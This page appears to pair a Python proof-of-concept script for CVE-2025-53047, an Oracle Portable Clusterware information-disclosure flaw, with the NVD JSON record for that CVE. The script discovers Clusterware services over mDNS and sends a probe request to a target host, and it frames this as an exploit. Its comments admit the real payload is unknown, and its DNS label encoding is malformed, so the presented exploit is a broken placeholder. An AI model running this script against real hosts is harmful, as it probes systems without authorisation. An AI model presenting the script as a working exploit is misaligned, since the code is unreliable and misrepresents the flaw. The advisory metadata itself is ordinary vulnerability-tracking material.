CVE-2025-53047

# CVE-2025-53047 PoC - Oracle Portable Clusterware Information Disclosure # Vulnerability: Unauthenticated read access via Bonjour protocol # Affected: Oracle Database Server 19.3-19.28, 21.3-21.19, 23.4-23.9 import socket import struct import sys def discover_bonjour_services(target_subnet='224.0.0.251', port=5353, timeout=5): """ Discover Oracle Clusterware services via Bonjour/mDNS multicast """ # mDNS query for Oracle Clusterware services mdns_query = b'\x00\x00' # Transaction ID mdns_query += b'\x00\x00' # Flags (standard query) mdns_query += b'\x00\x01' # Questions: 1 mdns_query += b'\x00\x00' # Answers: 0 mdns_query += b'\x00\x00' # Authority: 0 mdns_query += b'\x00\x00' # Additional: 0 # Query for _oracle_clusterware._tcp.local query_name = b'\x0c_oracle_cluster\x07ware\x04_tcp\x05local\x00' mdns_query += query_name mdns_query += struct.pack('>HH', 12, 1) # Type PTR, Class IN sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.settimeout(timeout) try: sock.sendto(mdns_query, (target_subnet, port)) while True: data, addr = sock.recvfrom(4096) print(f"[+] Discovered service at: {addr}") parse_mdns_response(data) except socket.timeout: print("[*] Discovery complete") finally: sock.close() def parse_mdns_response(data): """Parse mDNS response to extract service information""" # Simplified parser for demonstration print(f"[*] Response data length: {len(data)}") # In real exploitation, extract service details and endpoints def exploit_unauthorized_read(target_host, target_port): """ Attempt unauthorized read access to Portable Clusterware """ print(f"[*] Targeting {target_host}:{target_port}") # Craft malicious request to trigger information disclosure # Note: Actual exploit payload would depend on specific protocol implementation payload = b"GET /clusterware/status HTTP/1.1\r\n" payload += f"Host: {target_host}\r\n".encode() payload += b"Connection: close\r\n" payload += b"\r\n" try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) sock.send(payload) response = sock.recv(4096) print(f"[+] Received response ({len(response)} bytes)") # Response may contain sensitive cluster information return response except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": if len(sys.argv) > 1: target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 1521 exploit_unauthorized_read(target, port) else: print("Usage: python poc.py <target_host> [target_port]") print("Running Bonjour discovery mode...") discover_bonjour_services()

{"cve": {"id": "CVE-2025-53047", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:42.277", "lastModified": "2025-10-23T16:07:04.627", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Portable Clusterware component of Oracle Database Server. Supported versions that are affected are 19.3-19.28, 21.3-21.19 and 23.4-23.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via Bonjour to compromise Portable Clusterware. While the vulnerability is in Portable Clusterware, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in unauthorized read access to a subset of Portable Clusterware accessible data. CVSS 3.1 Base Score 5.8 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N", "baseScore": 5.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "19.3", "versionEndIncluding": "19.28", "matchCriteriaId": "A44BB715-42DA-4649-BBAA-8AA48F6DAEC9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "21.3", "versionEndIncluding": "21.19", "matchCriteriaId": "1AD18CAC-40C7-4A13-8959-33972C8E093A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:database_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "23.4", "versionEndIncluding": "23.9", "matchCriteriaId": "8F8D00E7-212D-4484-935A-FA14427522AE"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}